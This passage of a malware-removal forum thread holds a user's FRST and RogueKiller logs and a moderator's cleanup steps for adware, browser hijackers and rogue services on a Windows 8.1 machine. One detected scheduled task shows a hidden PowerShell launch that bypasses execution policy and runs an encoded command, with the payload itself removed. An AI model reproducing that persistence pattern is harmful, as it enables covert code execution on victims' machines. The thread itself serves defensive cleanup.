    2017-03-07 00:17 - 2017-01-10 05:58 - 00000000 ____D C:\ProgramData\SOLIDWORKS
    2017-03-05 18:14 - 2016-08-18 07:06 - 00000000 ____D C:\ProgramData\Autodesk
    2017-03-05 18:10 - 2016-08-18 07:05 - 00000000 ____D C:\Users\User\AppData\Roaming\Autodesk
    2017-03-05 18:09 - 2017-01-10 01:59 - 00000000 ____D C:\Program Files (x86)\Autodesk
    2017-03-05 18:08 - 2017-01-10 04:03 - 00000000 ____D C:\Users\Public\Documents\Autodesk
    2017-03-05 18:08 - 2016-08-18 05:34 - 00000000 ____D C:\Users\User\AppData\Local\Autodesk
    2017-03-05 17:48 - 2017-01-10 01:54 - 00000000 ____D C:\Program Files\Common Files\Autodesk Shared
    2017-03-05 17:44 - 2017-01-10 04:03 - 00000000 ____D C:\Program Files\Autodesk
    2017-03-05 04:13 - 2017-01-10 00:19 - 00000000 ____D C:\Autodesk
    2017-03-02 21:44 - 2016-03-07 00:43 - 00000000 ____D C:\ProgramData\CanonIJPLM
    2017-03-02 04:36 - 2017-01-11 19:16 - 00000000 ____D C:\ProgramData\DassaultSystemes
    2017-03-01 02:22 - 2016-08-19 03:06 - 00002174 _____ C:\Users\User\Desktop\WhatsApp.lnk
    2017-03-01 02:22 - 2016-08-19 03:05 - 00000000 ____D C:\Users\User\AppData\Local\SquirrelTemp
    2017-02-28 04:51 - 2016-12-14 18:01 - 00003162 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task v2
    2017-02-28 04:51 - 2016-08-23 00:24 - 00003170 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-3023424667-1579791547-2771295078-1001
    2017-02-26 23:20 - 2017-01-23 16:40 - 00000000 ___HD C:\Users\Public\Documents\.adata
    2017-02-26 23:20 - 2017-01-23 16:39 - 00000000 ____D C:\ProgramData\SofTest
    2017-02-22 23:45 - 2013-08-22 07:36 - 00000000 ___HD C:\Program Files\WindowsApps
    2017-02-22 23:45 - 2013-08-22 07:36 - 00000000 ____D C:\Windows\AppReadiness
    2017-02-22 23:29 - 2014-12-03 08:56 - 00000000 ____D C:\ProgramData\Skype
    2017-02-21 21:25 - 2016-11-01 00:40 - 00000000 ____D C:\Program Files (x86)\WinArcher
    2017-02-21 08:39 - 2016-08-14 19:37 - 00000000 ____D C:\Program Files (x86)\Tafleclwther
    2017-02-21 08:12 - 2016-10-27 03:02 - 00000000 ___RD C:\Program Files (x86)\Skype
    2017-02-21 08:04 - 2016-10-25 06:34 - 00000000 ____D C:\ProgramData\WinSAPSvc
    2017-02-20 00:18 - 2017-02-09 05:27 - 00000000 ____D C:\Program Files (x86)\WinSnare(4.1.0)
    2017-02-15 23:22 - 2015-07-12 12:34 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
    2017-02-13 07:11 - 2017-01-17 05:49 - 00003638 _____ C:\Windows\System32\Tasks\WinTOOL
    2017-02-13 07:11 - 2017-01-17 05:49 - 00000000 ____D C:\ProgramData\wintools

    Files to move or delete:
    ====================
    C:\ProgramData\RefreshReg.vbs
    C:\ProgramData\Google Chrome.lnk.bat
    C:\ProgramData\Mozilla Firefox.lnk.bat


    ==================== Known DLLs (Whitelisted) =========================


    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\System32\winlogon.exe => MD5 is legit
    C:\Windows\System32\wininit.exe => MD5 is legit
    C:\Windows\explorer.exe
    [2015-07-14 10:18] - [2015-01-27 15:47] - 2501368 ____A (Microsoft Corporation) C10A66189DC8C090E7C84873EDCEBC88

    C:\Windows\SysWOW64\explorer.exe
    [2015-07-14 10:18] - [2015-01-27 15:41] - 2207488 ____A (Microsoft Corporation) 91E24273FCA076EA9E65DAFA98901225

    C:\Windows\System32\svchost.exe => MD5 is legit
    C:\Windows\SysWOW64\svchost.exe => MD5 is legit
    C:\Windows\System32\services.exe
    [2015-07-13 15:44] - [2015-04-08 14:55] - 0410128 ____A (Microsoft Corporation) E0C7813A97CA7947FF5C18A8F3B61A45

    C:\Windows\System32\User32.dll => MD5 is legit
    C:\Windows\SysWOW64\User32.dll => MD5 is legit
    C:\Windows\System32\userinit.exe => MD5 is legit
    C:\Windows\SysWOW64\userinit.exe => MD5 is legit
    C:\Windows\System32\rpcss.dll => MD5 is legit
    C:\Windows\System32\dnsapi.dll => MD5 is legit
    C:\Windows\SysWOW64\dnsapi.dll
    [2015-07-13 21:22] - [2014-10-28 17:06] - 0498688 ____A (Microsoft Corporation) BD9C7A068C46053F8747CEA73B5930AB

    C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit

    ==================== Association (Whitelisted) =============


    ==================== Restore Points =========================

    Restore point date: 2017-03-05 05:12
    Restore point date: 2017-03-05 17:31
    Restore point date: 2017-03-13 19:40

    ==================== Memory info ===========================

    Percentage of memory in use: 20%
    Total physical RAM: 3979.43 MB
    Available physical RAM: 3178.79 MB
    Total Virtual: 3979.43 MB
    Available Virtual: 3202.24 MB

    ==================== Drives ================================

    Drive c: (OS) (Fixed) (Total:186.3 GB) (Free:67.27 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive d: (Data) (Fixed) (Total:263.35 GB) (Free:199.93 GB) NTFS
    Drive e: (flash it) (Removable) (Total:0.04 GB) (Free:0.04 GB) FAT
    Drive f: () (Removable) (Total:3.71 GB) (Free:3.7 GB) FAT32
    Drive g: (Recovery) (Fixed) (Total:0.88 GB) (Free:0.55 GB) NTFS ==>[system with boot components (obtained from drive)]
    Drive x: (Boot) (Fixed) (Total:0.5 GB) (Free:0.5 GB) NTFS

    ==================== MBR & Partition Table ==================

    ========================================================
    Disk: 0 (Size: 465.8 GB) (Disk ID: A60BBD6E)

    Partition: GPT.

    ========================================================
    Disk: 1 (Size: 38 MB) (Disk ID: 00000000)

    Partition: GPT.

    ========================================================
    Disk: 2 (Size: 3.7 GB) (Disk ID: 2C6B7369)
    No partition Table on disk 2.

    LastRegBack: 2017-03-11 20:20

    ==================== End of FRST.txt ============================
     
  8. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Download the attached fixlist.txt file and save it to the very same USB flash drive you've been using. Plug the drive back in.

    NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

    On Vista or Windows 7/8/10: Now please enter System Recovery Options.
    On Windows XP: Now please boot into the OTLPE CD.
    Run FRST (FRST64), press the Fix button just once, and wait.
    The tool will make a log on the flash drive (Fixlog.txt); please post it in your reply.

    Reboot normally
     


  9. 2017/03/13
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Fix result of Farbar Recovery Scan Tool (x64) Version: 13-03-2017
    Ran by SYSTEM (14-03-2017 12:36:09) Run:1
    Running from G:\
    Boot Mode: Recovery
    ==============================================

    fixlist content:
    *****************
    GroupPolicy: Restriction <======= ATTENTION
    S3 iThemes5; C:\Program Files (x86)\Common Files\Services\iThemes.dll [567808 2016-12-09] () <==== ATTENTION
    C:\Program Files (x86)\Common Files\Services\iThemes.dll
    S2 Themes; C:\Windows\system32\themeservice.dll [59392 2014-10-28] (Microsoft Corporation) [DependOnService: iThemes5]<==== ATTENTION
    C:\Windows\system32\themeservice.dll
    S2 WinSnare; C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll [776704 2017-03-12] (InterSect Alliance Pty Ltd) <==== ATTENTION
    S2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe [1254960 2016-08-29] (ExWzp Pvt Ltd.) <==== ATTENTION
    S2 ed2kidle; "C:\Program Files (x86)\amuleC\ed2k.exe" -downloadwhenidle [X] <==== ATTENTION
    C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll
    S2 winzipersvc; C:\Program Files (x86)\WinZipper\winzipersvc.exe
    S3 aswHdsKe; \??\C:\Windows\system32\drivers\aswHdsKe.sys [X]
    S3 dbx; system32\DRIVERS\dbx.sys [X]
    S0 msahci; system32\drivers\msahci.sys [X]
    C:\ProgramData\RefreshReg.vbs
    C:\ProgramData\Google Chrome.lnk.bat
    C:\ProgramData\Mozilla Firefox.lnk.bat


    *****************

    C:\Windows\System32\GroupPolicy\Machine => moved successfully
    C:\Windows\System32\GroupPolicy\GPT.ini => moved successfully
    C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
    HKLM\System\ControlSet001\Services\iThemes5 => key removed successfully
    iThemes5 => service removed successfully
    HKLM\System\ControlSet001\Services\Themes\\DependOnService => value removed successfully
    C:\Program Files (x86)\Common Files\Services\iThemes.dll => moved successfully
    HKLM\System\ControlSet001\Services\Themes\\DependOnService => value not found.
    C:\Windows\system32\themeservice.dll => moved successfully
    HKLM\System\ControlSet001\Services\WinSnare => key removed successfully
    WinSnare => service removed successfully
    HKLM\System\ControlSet001\Services\winzipersvc => key removed successfully
    winzipersvc => service removed successfully
    HKLM\System\ControlSet001\Services\ed2kidle => key removed successfully
    ed2kidle => service removed successfully
    C:\Users\User\AppData\Roaming\WinSnare\WinSnare.dll => moved successfully
    winzipersvc => service not found.
    HKLM\System\ControlSet001\Services\aswHdsKe => key removed successfully
    aswHdsKe => service removed successfully
    HKLM\System\ControlSet001\Services\dbx => key removed successfully
    dbx => service removed successfully
    HKLM\System\ControlSet001\Services\msahci => key removed successfully
    msahci => service removed successfully
    C:\ProgramData\RefreshReg.vbs => moved successfully
    C:\ProgramData\Google Chrome.lnk.bat => moved successfully
    C:\ProgramData\Mozilla Firefox.lnk.bat => moved successfully

    ==== End of Fixlog 12:36:10 ====
     
  10. 2017/03/13
    broni

    broni Moderator Malware Analyst

    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Double click on downloaded setup.exe file to install the program.
    • Click on Start Scan button.
    • Click on another Start Scan button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.
    Please download Malwarebytes to your desktop.
    • Double-click mb3-setup-consumer-{version}.exe and follow the prompts to install the program.
    • Then click Finish.
    • Once the program has fully updated, select Scan Now on the Dashboard. Or select the Threat Scan from the Scan menu.
    • If another update of the definitions is available, it will be implemented before the rest of the scanning procedure.
    • When the scan is complete, make sure that all Threats are selected, and click Remove Selected.
    • Restart your computer when prompted to do so.
    • The Scan log is available through History -> Application logs. Please post its contents in your next reply.
    Please download AdwCleaner by Xplode and save to your Desktop.
    • Double click on AdwCleaner.exe to run the tool.
      Vista/Windows 7/8 users right-click and select Run As Administrator
    • The tool will start to update the database if one is required.
    • Click on the Scan button.
    • AdwCleaner will begin...be patient as the scan may take some time to complete.
    • After the scan has finished, click on the Logfile button.
    • A window will open which lists the logs of your scans.
    • Click on the Scan tab.
    • Double-click the most recent scan which will be at the top of the list....the log will appear.
    • Review the results...see note below
    • After reviewing the log, click on the Clean button.
    • Press OK when asked to close all programs and follow the onscreen prompts.
    • Press OK again to allow AdwCleaner to restart the computer and complete the removal process.
    • After rebooting, a logfile report (AdwCleaner[CX].txt) will open automatically (where the largest value of X represents the most recent report).
    • To open a Cleaning log, launch AdwCleaner, click on the Logfile button, click on the Cleaning tab and double-click the log at the top of the list.
    • Copy and paste the contents of AdwCleaner[CX].txt in your next reply.
    • A copy of all logfiles is saved to C:\AdwCleaner.
    -- Note: The contents of the AdwCleaner log file may be confusing. Unless you see a program name or entry that you recognize and know should not be removed, don't worry about it. If you see an entry you want to keep, return to AdwCleaner before cleaning...all detected items will be listed (and checked) in each tab. Click on and uncheck any items you want to keep.


    Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista or Seven, right-mouse click it and select Run as Administrator.
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
  11. 2017/03/14
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    RogueKiller V12.10.0.0 (x64) [Mar 13 2017] (Free) by Adlice Software
    mail : Contact - Adlice Software
    Feedback : Adlice forum - Home
    Website : RogueKiller Anti-Malware Free Download - Official Website
    Blog : Adlice Software

    Operating System : Windows 8.1 (6.3.9600) 64 bits version
    Started in : Normal mode
    User : User [Administrator]
    Started from : C:\Program Files\RogueKiller\RogueKiller64.exe
    Mode : Scan -- Date : 03/15/2017 10:43:21 (Duration : 01:50:03)

    ¤¤¤ Processes : 18 ¤¤¤
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iSafeSvc.exe(300) -- C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe[7] -> Found
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iSafeSvc2.exe(672) -- C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc2.exe[7] -> Found
    [Adw.FakeBro|VT.Adware.Elex] iedvutils.exe(1764) -- C:\Program Files (x86)\Explorer\iedvutils.exe[7] -> Found
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iSafeTray.exe(2660) -- C:\Program Files (x86)\Elex-tech\YAC\iSafeTray.exe[7] -> Found
    [Adw.Elex] svchost.exe(3988) -- C:\Windows\SysWOW64\svchost.exe[7] -> Found
    [Adw.Elex] svchost.exe(4036) -- C:\Windows\SysWOW64\svchost.exe[7] -> Found
    [Adw.Elex|Suspicious.Path|Tr.Eroyee|Proc.RunPE|VT.Corrupted] Kyubey.exe(2548) -- C:\Users\User\AppData\Roaming\Kyubey\Kyubey.exe[-] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] FirefoxUpdate.exe(2564) -- C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe[7] -> Found
    [PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] iDskDllPatch64.dll(2220) -- C:\Program Files (x86)\Elex-tech\YAC\iDskDllPatch64.dll[7] -> Found
    [PUP.Gen0|PUP.Gen1|VT.Trojan:Win32/Xadupi] wzShellctx64.dll(2220) -- C:\Program Files (x86)\WinZipper\wzShellctx64.dll[-] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] (SVC) FirefoxU -- "C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe"[7] -> Found
    [Adw.FakeBro|VT.Adware.Elex] (SVC) iedvutils -- C:\Program Files (x86)\Explorer\iedvutils.exe[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnl -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnlKit -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnlMon -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeKrnlR3 -- \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeNetFilter -- system32\DRIVERS\iSafeNetFilter.sys[7] -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (SVC) iSafeService -- C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe[7] -> Found

    ¤¤¤ Registry : 70 ¤¤¤
    [PUP.Gen0] (X64) HKEY_CLASSES_ROOT\CLSID\{6710C780-E20E-4C49-A87D-321850ED3D7C} -> Found
    [PUP.Gen0|PUP.Gen1|VT.Trojan:Win32/Xadupi] (X64) HKEY_CLASSES_ROOT\CLSID\{DC638EEA-2BA2-4459-9C46-85A2F0BE6040} (C:\Program Files (x86)\WinZipper\wzShellctx64.dll) -> Found
    [Adw.Elex] (X64) HKEY_LOCAL_MACHINE\Software\InterSect Alliance -> Found
    [PUP.Gen0] (X64) HKEY_LOCAL_MACHINE\Software\jhdbca -> Found
    [PUP.Amisites] (X86) HKEY_LOCAL_MACHINE\Software\amisitesSoftware -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Elex-tech -> Found
    [Adw.FakeBro] (X86) HKEY_LOCAL_MACHINE\Software\Explorer -> Found
    [PUP.Ghokswa] (X86) HKEY_LOCAL_MACHINE\Software\Firefox -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\hdcode -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\InterHop -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\jhdbca -> Found
    [PUP.StartPageIng] (X86) HKEY_LOCAL_MACHINE\Software\startpageing123Software -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\trotuxSoftware -> Found
    [Adw.Elex] (X86) HKEY_LOCAL_MACHINE\Software\UvConverter -> Found
    [PUP.WinArcher|PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\WinArcher -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\WinSaberSvc -> Found
    [PUP.Gen0] (X64) HKEY_USERS\.DEFAULT\Software\jhdbca -> Found
    [PUP.Gen0] (X86) HKEY_USERS\.DEFAULT\Software\jhdbca -> Found
    [Adw.FakeBro] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Explorer -> Found
    [PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17 -> Found
    [PUP.Gen1] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ProductSetup -> Found
    [Adw.Elex] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\WinSnare -> Found
    [Adw.FakeBro] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Explorer -> Found
    [PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ICSW1.17 -> Found
    [PUP.Gen1] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\ProductSetup -> Found
    [Adw.Elex] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\WinSnare -> Found
    [PUP.Gen0] (X64) HKEY_USERS\S-1-5-18\Software\jhdbca -> Found
    [PUP.Gen0] (X86) HKEY_USERS\S-1-5-18\Software\jhdbca -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564 -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\iSafe -> Found
    [PUP.QRss] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall\{56B2B28A-E663-4D28-84A3-3846068A7D63} -> Found
    [PUP.Gen0] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ba32987d-db80-4ccb-a8bb-f812b5421c0f} -> Found
    [Suspicious.Path] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Run | AfterPlayMonitor : C:\Users\User\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.exe [7] -> Found
    [Suspicious.Path] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Run | AfterPlayMonitor : C:\Users\User\AppData\Roaming\Letv\AfterPlay\AfterPlayMonitor.exe [7] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\FirefoxU ("C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe") -> Found
    [Adw.FakeBro|VT.Adware.Elex] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iedvutils (C:\Program Files (x86)\Explorer\iedvutils.exe) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnl (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnl.sys) -> Found
    [PUP.Gen0|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlBoot (system32\DRIVERS\iSafeKrnlBoot.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlKit (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlKit.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlMon (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeKrnlR3 (\??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlR3.sys) -> Found
    [PUP.Gen0|PUP.Yac|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeNetFilter (system32\DRIVERS\iSafeNetFilter.sys) -> Found
    [PUP.Gen0|PUP.Yac|PUP.Gen1|VT.FraudTool.YAC] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\iSafeService (C:\Program Files (x86)\Elex-tech\YAC\iSafeSvc.exe) -> Found
    [PUM.Proxy] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : 127.0.0.1:8118 -> Found
    [PUM.Proxy] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings | ProxyServer : 127.0.0.1:8118 -> Found
    [PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Start Page : MyLucky123 -> Found
    [PUM.HomePage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.HomePage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.HomePage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Page_URL : MyLucky123 -> Found
    [PUM.SearchPage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Search Page : {searchTerms} - Google Search -> Found
    [PUM.SearchPage] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.mylucky123.com/search/?t...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUP.Gen1] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.nuesearch.com/search/?ty...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUM.SearchPage] (X64) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.mylucky123.com/search/?t...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUM.SearchPage] (X86) HKEY_USERS\S-1-5-21-3023424667-1579791547-2771295078-1001\Software\Microsoft\Internet Explorer\Main | Default_Search_URL : http://www.mylucky123.com/search/?t...01ABF050_Z4LKC79YTXXZ4LKC79YT&q={searchTerms} -> Found
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters | DhcpNameServer : 137.132.0.254 137.132.0.252 ([Singapore][Singapore]) -> Found
    [PUM.Dns] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\Tcpip\Parameters\Interfaces\{4B1A8B33-03CA-4186-B2E3-936CF07F5CEF} | DhcpNameServer : 137.132.0.254 137.132.0.252 ([Singapore][Singapore]) -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {501B833C-BFF1-45A8-849F-9EB93F30B64E} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\User\AppData\Local\Doyo\DYService.exe|Name=??????| [x] -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {1C45797D-99A6-4473-AC81-0B9344D30C42} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\Users\User\AppData\Local\Doyo\MiniDown\download\MiniThunderPlatform.exe|Name=???????| [x] -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {3BF4294A-3D72-4D79-A690-3F9264E10BC8} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\Newjob\Newjob.exe|Name=Protect service| [x] -> Found
    [Suspicious.Path] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {38AF029C-111C-40CE-8715-10F8E25BF8B0} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\ProgramData\Fishlose\Fishlose.exe|Name=Protect service| [x] -> Found
    [PUP.Ghokswa|VT.Adware.Elex] (X64) HKEY_LOCAL_MACHINE\System\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules | {805079A0-1323-48C6-B317-56DE91AC91E0} : v2.22|Action=Allow|Active=TRUE|Dir=In|App=C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe|Name=Update service| [7] -> Found
    [PUM.Policies] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found
    [PUM.Policies] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System | ConsentPromptBehaviorAdmin : 0 -> Found

    ¤¤¤ Tasks : 2 ¤¤¤
    [Adw.Elex|Suspicious.Path|VT.Adware.Elex] \WinTOOL -- C:\ProgramData\wintools\WintoolUprI.exe (/update) -> Found
    [Mal.Powershell] \{0E790447-0C04-7A78-0F11-787A0D0A110F} -- C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand [Base64 payload removed]) -> Found

    ¤¤¤ Files : 54 ¤¤¤
    [PUP.Gen0][Folder] C:\ProgramData\ChelfNotify -> Found
    [PUP.Gen1][Folder] C:\ProgramData\Tencent -> Found
    [PUP.Gen0][Folder] C:\ProgramData\WinSAPSvc -> Found
    [Adw.Elex][Folder] C:\ProgramData\wintools -> Found
    [Adw.FakeBro][File] C:\Users\Public\Desktop\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Ghokswa][File] C:\Users\Public\Desktop\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [Adw.FakeBro][File] C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [Hj.Shortcut][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
